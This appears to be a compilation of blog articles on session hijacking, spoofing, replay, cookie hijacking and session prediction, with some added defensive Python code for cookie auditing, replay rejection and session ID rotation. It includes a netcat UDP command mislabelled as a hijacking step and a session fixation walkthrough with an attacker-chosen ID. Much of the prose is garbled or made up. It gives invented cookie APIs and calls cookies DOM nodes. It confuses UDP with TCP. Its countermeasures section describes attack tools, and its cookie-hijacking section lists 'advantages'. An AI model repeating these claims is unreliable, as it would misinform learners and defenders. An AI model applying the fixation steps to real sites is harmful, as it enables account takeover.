Hacker Hub 8

Just learn and hack


TCP/IP stands for Transmission Control Protocol/Internet Protocol. It is a communication protocol by which network devices interconnect on the internet and communicate with each other. TCP is used together with IP, so the two are referred to as TCP/IP. TCP/IP lies between the Application and Network Layers, which are used in providing reliable delivery service.

TCP/IP Layer

Working:

The TCP model breaks down the sender's messages or data into small packets and forwards them to the Internet Protocol (IP) layer. The packets are then sent through various routes to their destination. When one route is congested or cannot be used to reach the destination, packets take other routes, so they may arrive over multiple routes, but the destination remains the same during the process. When the packets arrive at their destination, they are reassembled into the original message or data, and the receiver receives the message or data. The TCP layer in the sender system waits for the end of the transfer and acknowledges when all packets are received.

Request-Response Diagram in TCP/IP

 

TCP/IP Hijacking:

TCP/IP hijacking is a man-in-the-middle network attack. This is a network attack where an authorized user can gain access to another user’s or client’s authorized network connection. After hijacking a TCP/IP session, an attacker can easily read and modify the transferred packets and can also send their own requests to the user. For TCP/IP hijacking, attackers use DoS attacks and IP spoofing.

TCP/IP Hijacking Process:

  • The first major goal of an attacker is to obtain the IPs of two devices that communicate using the same network or connection. To do this, the attacker monitors the data transmission on the network until the IP of the device is obtained.
  • After successfully grabbing the user's IP, hackers can easily attack the connection.
  • In order to gain access to the connection, the hacker takes down the connection of another user through a DoS attack, and the user’s connection waits for reconnection.
  • By spoofing the disconnected user’s IP, hackers can easily restore communication.

Preventive Measures:

  • Do not click on unwanted or unknown links.
  • Check the web application for all errors.
  • Use an Intrusion Detection System (IDS) to monitor network traffic for unwanted or unknown activity and detect ARP spoofing/poisoning.
  • Use a switch instead of a hub for increased security. 
  • Always send the session ID over SSL for increasing security.
  • Use a different number of session IDs for each page.
  • Always use a secure protocol like HTTPS instead of a plain text protocol like HTTP, especially when you do not know which is right.

UDP is a low-level transport protocol used on LANs and WANs to send packets between two endpoints. UDP Session Hijacking is an attack where the attacker tricks the victim into using their computer as part of a botnet, typically by sending them unsolicited requests disguised as coming from legitimate sources. This illegitimate traffic can then be used to exploit vulnerable systems or steal data. UDP session hijacking is a method of compromising a computer session by manipulating the session’s Transmission Control Protocol (TCP) traffic. The attacker manipulates the data sent over the network, which can then be used to hijack the session or steal information.

There are a number of risks involved with using UDP session hijacking in ethical hacking. Firstly, UDP packets are not encrypted and are therefore easier to capture and manipulate. This makes it easier for the attacker to steal data or hijack the session. Additionally, the attacker has control over the data being sent, which means they can tamper with it in a number of ways. This could allow them to steal information or modify it in order to exploit the system.

UDP Session Hijacking

 

UDP Hijacking Attacks: 

  • One of the most powerful hackers will hijack a UDP broadcast. This allows them to steal data like passwords and credit cards. 
  • The attacker, who can be someone nearby or halfway around the world, accesses the information by sending out a false reply to the victim’s communications request to an application that uses UDP as its transport protocol. 
  • This is possible in Windows XP, Windows Vista, Windows 7, and Windows 8 operating systems.
  • UDP packets are accepted by default on most versions of Microsoft operating system since XP. It is a default setting for anyone using an application on this operating system. Since these packets are not verified by the operating system, a hacker can send one reply to another legitimate user’s request. 
  • This allows the hacker to receive any useful data like passwords and credit cards from the unsuspecting user. This is dangerous because no one notices anything unless the session gets degraded or broken because of a lack of response from the server.
  • If firewall protection is in place, it will notify the user and block any unauthorized incoming packets.

A Scenario of UDP Session Hijacking:

  • In UDP session hijacking, an attacker doesn’t need features like Transmission control protocol, for example, sequence numbers and ACK mechanism to do session hijacking.
  • These attacks took place in the wild back at the beginning of 1995. In this attack, an attacker is concerned about the connection between terminals.

Examples of UDP Session Hijacking:

We can use netcat on Kali Linux to perform UDP Session Hijacking.

Step 1: Open a terminal on Kali Linux.

Step 2: Type the following command to communicate with the UDP server.

nc -z -v -u [localhost address] [UDP port]

Output:

 

Basic Help Command:

netcat help commands

 

Conclusion:

UDP hijacking is a new type of attack that can help malicious people steal valuable data from unsuspecting users. This is dangerous because it does not leave any trace or sign of the attack except for an unresponsive program. It is expected that this type of attack will become better known as the number of devices connected to the Internet grows and reaches an expected 50 billion by 2020.

Session hijacking is a hacking technique. In it, the hackers (those who perform the hacking) gain access to a target’s computer or online account and exploit the whole web session control mechanism. This is done by taking over an active TCP/IP communication session by performing illegal actions on a protected network. Normally, web sessions are managed by a session token. The session hijacker has access to everything the actual user has. For example, when a user is shopping in an online store or paying electricity bills, the session hijackers attack the web browser or web application session.

Session Hijacking Types

 

Types of Session Hijacking:

Session hijacking is of three types:

  1. Active Session Hijacking: Active session hijacking occurs when the attacker takes control of the active session. The actual user of the network is forced offline, and the attacker acts as the authorized user. The attacker can also take control of the communication between the client and the server. To interrupt the communication between client and server, the attackers send massive traffic at a valid session and cause a denial of service (DoS).
  2. Passive Session Hijacking: In passive session hijacking, instead of controlling the overall session of a targeted user, the attacker monitors the communication between a user and a server. The main motive of the hacker is to listen to all the data and record it for future use. Basically, the attacker steals the exchanged information and uses it for irrelevant activity. This is also a kind of man-in-the-middle attack (as the attacker is in between the client and the server exchanging information).
  3. Hybrid Hijacking: The combination of active session hijacking and passive session hijacking is referred to as hybrid hijacking. Here the attackers monitor the communication channel (the network traffic), and whenever they find an issue, they take over control of the web session and fulfill their malicious tasks.

To perform all these kinds of session hijacking attacks, the attackers use various methods. They can use a single method or more than one method simultaneously. Those methods are:

  1. Brute-forcing the Session ID
  2. Cross-Site Scripting (XSS) or Misdirected Trust
  3. Man-in-the-browser
  4. Malware infections
  5. Session Fixation
  6. Session side-jacking

All these session hijacking methods can be elaborated as:

  1. Brute-forcing the Session ID: As the name suggests, the attacker uses guessing and trial to find the session ID, depending on its length. This works because of a lack of security and a short ID length. With the introduction of strong, long session keys, use of this method has grown only slowly.
  2. Cross-Site Scripting (XSS) or Misdirected Trust: In cross-site scripting, the attacker tries to find the flaws and weak points in the web server and injects code into it. This activity helps the attacker find out the session ID.
  3. Man-in-the-browser: Man-in-the-browser uses a Trojan horse (a program that uses malicious code) to perform its required action. The attacker puts themselves in the communication channel between a server and a client. The main purpose of this attack is to commit financial fraud.
  4. Malware infections: In malware infections, the attacker deceives the user into opening a link to a malware or Trojan program, which installs malicious software on the device. These programs are designed to steal browser cookies without the user’s knowledge.
  5. Session Fixation: In session fixation, attackers create a duplicate or otherwise disguised session. The attacker simply motivates or tricks the user into authenticating to the vulnerable server. This can be done by sending the user an email with a link which, when clicked, directs to the attacker's session.
  6. Session side-jacking: In session side-jacking, the attacker tries to get access to a session using the network traffic. This becomes easy when the user is using insecure Wi-Fi. The reading of network traffic and stealing of the session cookie is done by packet sniffing. Packet sniffing is a technique by which the data flowing across a network is observed.

In spoofing, the hacker's main goal is to win the trust of the target (victim) by convincing them that they are interacting with a trusted source. After winning trust, hackers can easily enter the target system, spread the malicious code of the malware, and steal useful information such as passwords, PINs, etc., that the target stores in the system. In spoofing, the hacker’s main objective is to psychologically manipulate the target and win their trust. For example, hackers create a clone of a banking website that appears completely legitimate, but when the target enters sensitive information, all of it is sent to the hacker, who can use it for their own benefit or for other purposes.

Types of Spoofing

 

In hijacking, a hacker can take complete control of a target computer system or hijack a network connection. Once hijacked, the hacker can take control of the target user’s computer system and even easily read and modify the transmitted data or messages. In hijacking, the main goal of a hacker is to take control of a target computer system or network connection to steal information without the target knowing that they are being hacked or hijacked. For example, hackers take full control of the target computer system and use its camera to gather sensitive information and spy.

Hijacking of session

 

Difference Between Spoofing and Hijacking:

Topics to Discuss (Spoofing compared with Hijacking)

Objective

  • Spoofing: The main objective of the hacker in spoofing is to psychologically manipulate the target and win their trust by convincing them.
  • Hijacking: The main objective of hackers in hijacking is to take control over the target computer system or network connections to steal information without the target knowing that they are being hacked or hijacked.

Requirement

  • Spoofing: Technical knowledge is required, but coding is not that important.
  • Hijacking: Technical knowledge and coding are required.

Software Requirements

  • Spoofing: The malicious software needs to be downloaded to the victim’s computer.
  • Hijacking: Malicious software may or may not be required to download on the victim’s computer. As Hackers, , other security suites do different types of attacks for hijacking.

Types

  • Spoofing: IP Spoofing, Email Spoofing, URL Spoofing etc.
  • Hijacking: Browser hijacking, session hijacking, domain hijacking, domain name system (DNS) hijacking, Internet Protocol (IP) hijacking, page hijacking etc.

Preventive Measure

  • Before opening, check the URL of the website. Only open trusted and legitimate websites.
  • Do not enter any information on the website until you have confirmed that the website is legitimate and trustworthy.
  • Avoid clicking on links in unfamiliar emails. Only open attached files or other types of attachments from trusted sources.
  • Protect your device or computer from all known and unknown viruses with a powerful updated security suite and antivirus software.
  • Avoid downloading different types of unknown files, such as archive files (.zip, .rar), etc., because hackers hide malicious programs in these file types.
  • Protect your system with a powerful updated antivirus and other security suite.
  • Back up your files regularly to reduce data loss.
  • Always stay updated with your software and operating system.  

 Application-level hijacking is one of the most popular ways hackers use to steal information. The attacker will modify the traffic and information being sent to a trusted application, then pretend the traffic came from a legitimate user. This type of attack is done on vulnerable web applications that do not use SSL to encrypt data. For this technique to work, attackers must find a vulnerability in a system that gives them control over requests going through the proxy server or man-in-the-middle (MITM) attack.

Proxy Hacking:

Proxy hacking is a method used by attackers to exploit a program’s internal functions by sending control commands to the proxy server. The proxy server is a program that forwards requests made by applications, but only if they’re within a specific scope. These programs have access to all network traffic as well as other computers on the network. This makes it easier for an attacker to gain access and compromise an entire network. An attacker can monitor, edit, or intercept traffic from systems outside the scope of the application. This gives them the ability to capture user credentials, modify data or exploit vulnerabilities on systems such as web servers and database servers.

Proxy Hacking

 

Scenario:

In this type of attack, the attacker uses a proxy server that has been hacked and connected to without the knowledge of the victim’s application. When an attacker is in place on the network and begins to monitor traffic, he can see where certain data is being sent to the website or server. The attacker then exploits this information by sending an HTTP request to modify or change data in some way.

Step 1: The attacker gathers information about the application or site from the target. This is done by using a proxy server to record all data going to and from the target site, including authentication details.


Step 2: Once an attacker gains access to a user’s details, he can then modify various parameters such as the user agent, user-name, password, session cookie ID or other important information that is sent to the server.

Step 3: In this step of the attack, an attacker will pretend to be a legitimate user and request a page on the application. The difference between the user-agent and the actual user-agent will be logged and sent to the attacker’s server.

Step 4: Using the obtained data, the attacker can now send a request through his proxy server. In this step, he’s telling the application that he is a legitimate user with a valid session and requesting information from its database.

Step 5: The attacker receives data as if he were a legitimate user because of the modified data that was sent in step 3. The data is sent to an element on his website or server, where it can be stored for future use or manipulated to obtain other sensitive information.

Conclusion: 

In this article, we learned about proxy hacking, an attack method used to exploit an application-level hijack. This can be done on applications that don’t use SSL and are vulnerable to man-in-the-middle attacks. By sending a request through an attacker’s proxy server which can modify data, the attacker is able to get information from the target site and network. The attacker gains access to sensitive data such as user information, passwords, and session cookies which are sent in plain text. Because of this vulnerability, it’s always important for organizations to ensure their servers are always patched up-to-date and using SSL encryption.

 Cyber security in today’s world is one of the biggest necessities of all time. It is important to safeguard the data that is present on the web. With the increasing demand for the internet and the services related to the internet, cyber crimes have become all the more common. 

It thus becomes important to protect the data and privacy of individuals, so that people using the internet feel safe while using the internet and related services. Crimes involving the internet also called cyber crimes have become all the more prevalent in modern times.

There are different types of cyber-attacks that are used by hackers to breach the privacy of individuals and harm/ steal their protected confidential data. One such cyber crime we will discuss in this article is the very risky ‘Man in the Browser Attack’.

Man in the Browser Attack:

  • Man in the browser is a very dangerous cyber attack. It is often regarded as another form of the ‘Man in the Middle Attack’.
  • Similar to the ‘Man in the Middle Attack’, it involves eavesdropping between two trusted sources. Here, the eavesdropping is carried out through a web browser.
  • The security vulnerabilities of the web browser are therefore at risk, as they are the target of attackers for data manipulation and theft of confidential information.
  • The Man in the Browser Attack is primarily chosen by attackers to cause financial harm to users by committing fraud against the user's bank account without the user knowing that he is becoming a victim of the attack.

How to Perform Man in the Browser Attack: 

  • The ‘Man in the Browser Attack’ is a form of cyber attack involving a Trojan horse that is mostly used for internet financial fraud, that is, against transactions done over the internet.
  • The Trojan horse attacks and manipulates the security calls involved in banking transactions to commit financial fraud.
  • Trojan horses involved in the ‘Man in the Browser Attack’ include SpyEye, Zeus, and Clampi, among others.
  • The Trojan horse can enter the system through dynamic load library, API, browser extensions, ajax worms, etc.
  • The Man in the Browser Attack is extremely risky because its mechanism involves a Trojan horse that attacks the internet transaction but still displays a successful transaction to the user. This makes it difficult for the user to know that he has been attacked.

Prevention from Man in the Browser Attack:

The different ways of preventing ‘Man in the browser attack’ are listed below: 

  • The best way to prevent a ‘Man in the browser attack’ is to use the ‘Out of Band (OOB) Transaction verification’ mechanism. The ‘Out of Band (OOB)’ mechanism verifies transactions by sending verification codes to mobile devices to authenticate the transaction.
  • Refrain from downloading pirated software.
  • Never click on unknown links received in the email.
  • Make sure to have an updated version of anti-virus installed in your computer systems.
  • Be vigilant to check the common Trojan locations. Trojan mostly resides in C:/Program File or C:/Windows/Temp.
  • Always buy verified software for your computer system and keep them updated according to market needs.

 The browser treats cookies as DOM nodes, so it is possible to manipulate cookies through the DOM. This is commonly referred to as “DOM-based cookie manipulation”. The most common use of this technique is to delete or edit the value of a cookie. For example, deleting third-party cookies might allow somebody to bypass cross-site tracking issues by clearing a tracker’s identifier from their memory. Similarly, editing the value of a single-access token could be used to generate infinite new sessions on sites like Facebook.

DOM-based Cookie Manipulation:

While cookies are technically DOM nodes, accessing them through the DOM would be rather inconvenient. Fortunately, there is an API provided by nsICookieManager which returns a reference to nsICookieStorage, an interface that exposes a number of convenient methods for managing cookies. The following code demonstrates how to use this API to delete a cookie.

Note that while deleting a cookie may seem like an effective way to block cross-site tracking, in reality, the deleted cookie will simply be replaced with a brand new one. Using this API, cookies are deleted via two different methods. The first method, deleteTopCookie, deletes the cookie in question from the memory of the user’s browser. The second method, deleteContainerCookie, deletes a cookie from the specified storage object. For example, this code would be used to delete an Access Token cookie from storage.

One caveat about deleting cookies through the DOM is that cookies stored in memory persist until deleted manually. For this reason, deleting a cookie does not actually prevent it from being used on subsequent visits. This makes it imperative that users are careful not to leave any cookies lying around in plain text or HTML form fields after they have been deleted.

In addition to being able to edit or delete cookies through the DOM, it is possible to set new values for cookies. This can be accomplished by creating a new cookie, setting its attributes, and then storing it with the Add() method of nsICookieStorage. For example, this code sets a cookie named “test cookie”. Note that the value of a cookie should be treated just like any other HTTP header. It can be manipulated via JavaScript, sent via AJAX requests, and so on.

 

DOM-based cookie manipulation

Countermeasures:

  • It is important to note that the browser does not automatically delete cookies that have been set with the Add() method. If a user deletes their cookie with the DeleteTopCookie() method of nsICookieManager, the browser will simply delete the corresponding storage object. 
  • Similarly, if a user deletes a cookie from within JavaScript, they will also need to clear it from storage (e.g., by calling DeleteContainerCookie()).
  • Be careful not to leave HTML form fields with cookies in them after form submission. 
  • Cookies stored there can only be deleted through JavaScript. If a user’s browser supports “cookies”, these fields should be protected against editing via JavaScript. 
  • Cookies with the HttpOnly attribute are inaccessible from JavaScript. 
  • Thus, it is not possible to manipulate cookies like normal DOM nodes. 
  • This can prevent some attacks like cross-site scripting (XSS). 
  • For example, cookie-based XSS attacks almost always require JavaScript in order to set a cookie and then read the value of that cookie via window.name. Without HttpOnly, these cookies could be used in cross-site request forgery (CSRF) attacks as well.
  • Although HttpOnly cookies offer more protection from XSS, there is one exception. An attacker with access to the value of a cookie stored in storage via CORS can still perform cross-site scripting (XSS) attacks using it.
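
The HttpOnly point above, together with the earlier advice to send the session ID only over SSL, can be checked on the Set-Cookie headers an application emits. The following Python check is an added example, not code from the original article; the sample headers and the name hints used to recognise session cookies are constructed assumptions.

```python
# Added example: audit Set-Cookie headers for session-cookie hardening flags.
# SAMPLE_HEADERS and SESSION_NAME_HINTS are constructed for illustration.

SESSION_NAME_HINTS = ("sess", "sid", "auth", "token")


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    if not parts:
        return "", "", {}
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header_value):
    """Return findings for a session cookie; [] if it is hardened or the
    cookie does not look like a session cookie."""
    name, _value, attrs = parse_set_cookie(header_value)
    if not any(hint in name.lower() for hint in SESSION_NAME_HINTS):
        return []
    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: script can read it via document.cookie")
    if "secure" not in attrs:
        findings.append("no Secure: cookie is also sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: sent on cross-site requests")
    return findings


SAMPLE_HEADERS = [
    "SESSIONID=MYSESSION; Path=/",                                  # weak
    "SESSIONID=MYSESSION; Path=/; Secure; HttpOnly; SameSite=Lax",  # hardened
    "theme=dark; Path=/",                                           # not a session cookie
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(header, "->", audit_set_cookie(header) or "ok")
```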

Key Points:

  • For these reasons, this technique should not be considered an effective cross-site tracking blocker. Setting cookies is quite easy, especially when compared to the difficulty of storing them.
  • Some browsers have implemented a database storage mechanism that helps mitigate the issues resulting from random cookie deletion. 
  • For example, Firefox includes a “secure cookie” feature that encrypts cookies using a user-provided password and stores them in an encrypted SQLite database. Chrome has chosen not to include this feature at least initially and treats unencrypted cookies as HTTP headers just like any other browser.
  • Cookie injection is a class of attack which occurs when a malicious script can modify or overwrite HTTP headers transmitted during client-server communication (Wikipedia: HTTP header injection).


An ethical hacker is able to use a session replay attack with the help of tools like Wireshark or Hping3. The hacker’s goal is to gain access to the network, data, and resources in order to fix any vulnerabilities that can be exploited by adversaries.

Session replay attacks, also known as replay attacks, are network attacks that maliciously “retry” or “delay” valid data transmissions. Hackers can do this by intercepting the session and stealing the user’s unique session ID (stored as either a cookie, URL, or form field). The hacker can now impersonate the authorized user and have full access to do everything the authorized user can do on the website.

A replay attack occurs when a cybercriminal intercepts a secure network communication and fraudulently delays or retransmits it to trick the recipient into doing what the hacker wants. The additional risk of replay attacks is that hackers don’t even need advanced skills to decrypt messages after capturing them from the network. The attack can be successful simply by resending everything.

Session Replay Attacks

 

Session Replay Attacks:

A session replay attack is an active intrusion technique where the attacker records and replays a victim’s internet session as if they were an authorized user, thus obtaining credentials for accessing confidential information. 


  • Your account settings may be hacked without your knowledge if your password can be phished or guessed by brute force.
  • The hacker can get access to your network remotely by using tools like BFD, Nmap, or Pivot. 
  • The attacker’s goal is to gain access to your data by intruding into your system and stealing sensitive information.

Key Points:

  • It may be easy for the attacker to know if you are offline or not as they can detect where you are connected from.
  • All the data that the session replay attack captures is saved in a format that is easily identified by the hacker, allowing them to take control of the network remotely.
  • The method depends on the type of session replay attack that the hacker is using to hack your account.
  • There are many ways for doing a session replay attack.
  • To start, the first step that you need to do is find out the IP address of your computer, you can use NMAP (Network Mapper).
  • After that, you need to go to your network settings and port forward. 

Working:

An attacker can intercept this message and resend it. Since this is just a genuine message that was resent, the message is already properly encrypted and looks legitimate to financial managers. In this scenario, the money manager may respond to this new request unless there is a reason for suspicion. This response could consist of sending a large amount of money to the attacker’s bank account.
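
Because the resent message is byte-for-byte genuine, encryption or a signature alone does not stop it; the receiver has to refuse anything it has already seen or that is too old. The following Python sketch is an added example, not code from the original article; the shared-key setup, field names, the 60-second window and the transfer body are constructed assumptions.

```python
# Added example: reject replayed requests using an HMAC tag, a timestamp and
# a one-time nonce. Key handling, field names and the body are constructed.
import hashlib
import hmac
import json
import secrets

MAX_AGE = 60  # seconds a signed request stays acceptable (assumed policy)


def sign_request(key, body, now):
    """Sender: wrap the body with a timestamp and a fresh nonce, then MAC it."""
    envelope = {"body": body, "ts": now, "nonce": secrets.token_hex(16)}
    payload = json.dumps(envelope, sort_keys=True)
    mac = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return {"payload": payload, "mac": mac}


class Receiver:
    """Receiver: accepts each authentic, fresh request exactly once."""

    def __init__(self, key):
        self.key = key
        self.seen = {}  # nonce -> timestamp of the request that used it

    def accept(self, message, now):
        payload = message["payload"].encode()
        expected = hmac.new(self.key, payload, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, message["mac"]):
            return "rejected: bad MAC"
        envelope = json.loads(payload)
        if abs(now - envelope["ts"]) > MAX_AGE:
            return "rejected: stale"
        # Nonces only need to be remembered while their request is still fresh.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= MAX_AGE}
        if envelope["nonce"] in self.seen:
            return "rejected: replay"
        self.seen[envelope["nonce"]] = envelope["ts"]
        return "accepted"


def replay_demo():
    """Original delivery, an immediate resend, a late resend, a modified copy."""
    key = secrets.token_bytes(32)
    receiver = Receiver(key)
    transfer = {"action": "transfer", "amount": 100, "to": "ACCT-EXAMPLE"}
    msg = sign_request(key, transfer, now=1000)
    tampered = dict(msg, payload=msg["payload"].replace('"amount": 100', '"amount": 900'))
    return [
        receiver.accept(msg, now=1005),
        receiver.accept(msg, now=1010),
        receiver.accept(msg, now=5000),
        receiver.accept(tampered, now=1005),
    ]


if __name__ == "__main__":
    print(replay_demo())
```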

Example:

The web application holds the session in a query parameter:

A web application can manage a user’s session based on the value of a query parameter, 

http://example.com/home/show.php?SESSIONID=MYSESSION,
where MYSESSION is the Session ID. 

This method is vulnerable to a session-specific replay attack, known as a session fixation attack.

  • The attacker generates his own session ID.
  • The attacker sends a URL with his session ID to a valid application user, e.g. http://example.com/home/show.php?SESSIONID=ATTACKER-SESSION
  • When a valid user clicks the link, a session will be started with the session ID ATTACKER-SESSION.
  • The valid user connects to the application using his credentials.
  • The attacker can now impersonate the valid user by visiting http://example.com/home/show.php?SESSIONID=ATTACKER-SESSION
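
The steps above succeed only if the server adopts a session ID it never issued and keeps the same ID across login. The following Python model is an added example, not code from the original article; the SessionStore class, its strict flag and the user name alice are hypothetical. It runs the same scenario against a server that behaves as described and against one that issues its own IDs and rotates them at login.

```python
# Added example: session fixation against a permissive and a hardened
# session store. SessionStore, "strict" and "alice" are hypothetical names.
import secrets


class SessionStore:
    """In-memory session table: session ID -> username (None = anonymous)."""

    def __init__(self, strict):
        self.strict = strict
        self.sessions = {}

    def open_session(self, client_sid=None):
        """Handle a request that may carry ?SESSIONID=<client_sid>."""
        if client_sid in self.sessions:
            return client_sid  # an ID this server issued earlier
        if client_sid is not None and not self.strict:
            # Vulnerable behaviour: adopt an ID the server never generated.
            self.sessions[client_sid] = None
            return client_sid
        sid = secrets.token_urlsafe(32)  # server-generated, unguessable
        self.sessions[sid] = None
        return sid

    def login(self, sid, username):
        """Bind the user to a session; return the ID the client must use next."""
        if self.strict:
            # Hardened behaviour: rotate the ID when privileges change and
            # invalidate the pre-login ID.
            self.sessions.pop(sid, None)
            sid = secrets.token_urlsafe(32)
        self.sessions[sid] = username
        return sid

    def whoami(self, sid):
        return self.sessions.get(sid)


def fixation_scenario(strict):
    """Replay the five steps; return (what the planted ID sees, what the
    victim's own ID sees) after the victim has logged in."""
    store = SessionStore(strict)
    planted = "ATTACKER-SESSION"               # steps 1-2: ID chosen by the attacker
    victim_sid = store.open_session(planted)   # step 3: victim follows the link
    victim_sid = store.login(victim_sid, "alice")  # step 4: victim authenticates
    return store.whoami(planted), store.whoami(victim_sid)  # step 5


if __name__ == "__main__":
    print("permissive:", fixation_scenario(strict=False))
    print("hardened:  ", fixation_scenario(strict=True))
```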

Countermeasures: 

  • You also need to make sure that a malicious program like Wireshark or Hping3 can capture your traffic and replay it back in your connection.
  • There are plugins on Wireshark that help you monitor traffic while also recording and replaying it in real-time into Hping3. You can find out more about this plugin on Wireshark’s website.
  • This type of attack is called a passive session replay (PSR) and it logs all the traffic that the hacker is accessing on the network.
  • The Wireshark program records and replays all your traffic for you, allowing you to see what everyone is doing and where they are located.
  • The Hping3 program allows you to monitor as well as replay your traffic and also captures files that may have been transferred across your connection, including passwords, hash values, and cookies. 

 Cookie Hijacking is a method by which webmasters break into other websites to steal cookies. This allows them to watch the victim’s browsing activity, log their keystrokes, gain access to credit card information and passwords, and more. Cookie hijacking attacks mainly involve injecting JavaScript code into a website by embedding it in the HTML of an otherwise authentic-looking email or advertisement. This malicious code is then executed by the browser when you visit the infected site; it will display an endless series of popups that may be used for phishing purposes to steal your login credentials or other sensitive information. Some sites have also been modified so that they take cookie data from visitors without requiring them to provide their login credentials first.

Cookie Hijacking in Ethical Hacking

 

As the name indicates, this attack is a hijack of cookies. Cookies are small text files that are created by the server and sent to the client with each page request. The main purpose of cookies is to make browsing easier for you by providing various types of information to websites such as your name, address, and search preferences so that they can customize your browsing experience based on your past visits. For example, Gmail will fill in certain suggestions automatically as soon as you start typing in a new message, without requiring you to dig through the Edit menu again and again.

Key Points: 

  • Many popular websites have been affected by cookie hijacking. For instance, Flickr has been hit by a script that steals users’ passwords and sends them to an attacker’s email address.
  • This type of attack occurs when the attacker embeds malicious JavaScript code into an otherwise authentic-looking email or advertisement. 
  • This malicious code is then executed by the victim’s browser when they visit the infected site; it will display an endless series of popups that may be used for phishing purposes to steal your login credentials or other sensitive information. 
  • In addition, some sites have also been modified so that they harvest cookie data from unsuspecting visitors without requiring them to provide their login credentials first.

Advantages: 

  • Cookie hijacking is a stealthy attack. It can take place without the victim knowing anything about it because the browser will send cookies automatically to any website the user navigates to. Most computer users do not realize the importance of protecting their cookies, which is why they often fall victim to such attacks.
  • Cookie hijacking attacks are hard to detect because they use seemingly authentic-looking emails or advertisements with malicious code embedded in them to spread from one user to another over time. There is no need for a hacker’s malicious server; these attacks can be carried out entirely by leveraging popular websites and email servers that people use daily for legitimate purposes as well.
  • In certain cases, the attacker can do more than just steal your login credentials or other sensitive information. He can also install malicious software on your computer, make you interact with phishing sites that may attack you with ransomware, or even make you visit phony pornographic websites and more.
  • Cookie hijacking is hard to detect because the user cannot be certain that they were visiting a legitimate website before any popups started appearing on their screen. Malicious JavaScript code can fool the user into thinking it was a legitimate message from one of his favorite websites that he visited earlier without realizing his cookies were hijacked at that time and sending the data from somewhere else.

Conclusion: 

Cookie hijacking is a serious threat that is often left unnoticed. If you are worried about such attacks on your computer, consider installing anti-malware software or activating the “Do Not Track” feature in your browser that protects you from cookie hijacking attacks. 

Session prediction attacks focus on predicting session ID values that allow an attacker to bypass the application’s authentication scheme. By analyzing and understanding the session ID generation process, an attacker could predict a valid session ID value and gain access to the application. The attacker needs to collect some valid session ID values that are used to identify the authenticated user. Next, you need to understand the structure of the session ID, the information used to create the session ID, and the encryption or hash algorithm used by the application to protect the session ID. Some improper implementations use a username or session ID consisting of other predictable information such as timestamps and client IP addresses. In the worst case, this information is used in plain text or encoded with a weak algorithm, such as Base64 encoding.

Session Prediction software attack

 

Session prediction is impossible without the help of the session ID cookie. Session cookies are used by websites to maintain a session with you. Session prediction is used by hackers to predict the next session and is used for malicious purposes. There are three ways in which a hacker can perform an attack:

  • Social Engineering: There are several ways hackers can use social engineering and deception to trick you. They will tell you that your PC is infected with a virus and will ask you to install their software so that they can repair your computer. They also send fake emails and messages on Facebook, make phone calls to let you know that your system has been attacked by a virus, and send attachments such as malware.
  • Spoofing: Spoofing is a technique that allows a hacker to use another visitor’s IP address to access a website and launch an attack. The only way to protect yourself from such attacks is to verify your IP address before visiting a website.
  • Session Prediction: This session prediction attack is used by hackers to use session ID cookies to access servers and perform malicious activities.

Working of Session Prediction Software Attack:

  • Session prediction and hijacking usually occur when legitimate users are interacting with the affected website. 
  • Depending on the level of technical knowledge and the nature of the attack, legitimate users may or may not be able to detect the intrusion. 
  • Session predictions or hijacking can occur if a website does not respond to user input normally or as expected, or if it stops responding at all for unknown reasons.

 Countermeasures:

  • Use HTTPS: Make sure you use HTTPS everywhere on your web servers and applications, especially SSO systems. In addition, all internet communications must be encrypted to protect the session at all stages. 
  • Install the framework: Web frameworks can generate longer and more random session cookies, which simplifies session management.
  • Rotate session key after authentication: Changing the session key after a successful login makes it difficult for the session hijacker to track the user’s session, even if they know the original key. With such a setting, the attacker would not be able to hijack the session using the self-generated key, even if the attacker sent a phishing link that the user clicked.
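The weak pattern described above (username, client IP and timestamp, Base64-encoded) next to a CSPRNG-generated ID that is rotated after login. This is an added example, not code from the original page; `SessionStore`, `audit_session_id` and all sample values are constructed for illustration.

```python
import base64
import secrets


def weak_session_id(username, client_ip, now):
    """Predictable ID of the kind described above: plain fields, Base64 only."""
    raw = f"{username}:{client_ip}:{int(now)}"
    return base64.b64encode(raw.encode()).decode()


def audit_session_id(sid, known_values=()):
    """Defensive check: list reasons a collected session ID looks predictable."""
    findings = []
    try:
        decoded = base64.b64decode(sid, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return findings  # not Base64-encoded text, so nothing readable inside
    if decoded.isprintable():
        findings.append(f"decodes to readable text: {decoded!r}")
        for value in known_values:
            if value and value in decoded:
                findings.append(f"embeds known value: {value!r}")
    return findings


class SessionStore:
    """Hypothetical in-memory store: random IDs, rotated on authentication."""

    def __init__(self):
        self._sessions = {}

    def create(self):
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, old_sid, username):
        """Mark the session authenticated and replace its ID.

        The pre-login ID is removed, so an ID an attacker learned or planted
        before authentication no longer maps to any session.
        """
        data = self._sessions.pop(old_sid, None)
        if data is None:
            raise KeyError("unknown session")
        data["user"] = username
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = data
        return new_sid

    def user_for(self, sid):
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None


if __name__ == "__main__":
    weak = weak_session_id("alice", "203.0.113.7", 1700000000)  # constructed values
    print(weak, audit_session_id(weak, ("alice", "203.0.113.7")))
    store = SessionStore()
    pre = store.create()
    post = store.login(pre, "alice")
    print(audit_session_id(pre), store.user_for(pre), store.user_for(post))
```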

 What is Session Hijacking?

TCP session hijacking is a security attack on a user session over a protected network. The most common method of session hijacking is called IP spoofing, when an attacker uses source-routed IP packets to insert commands into an active communication between two nodes on a network and disguise itself as one of the authenticated users. This type of attack is possible because authentication typically is only done at the start of a TCP session.

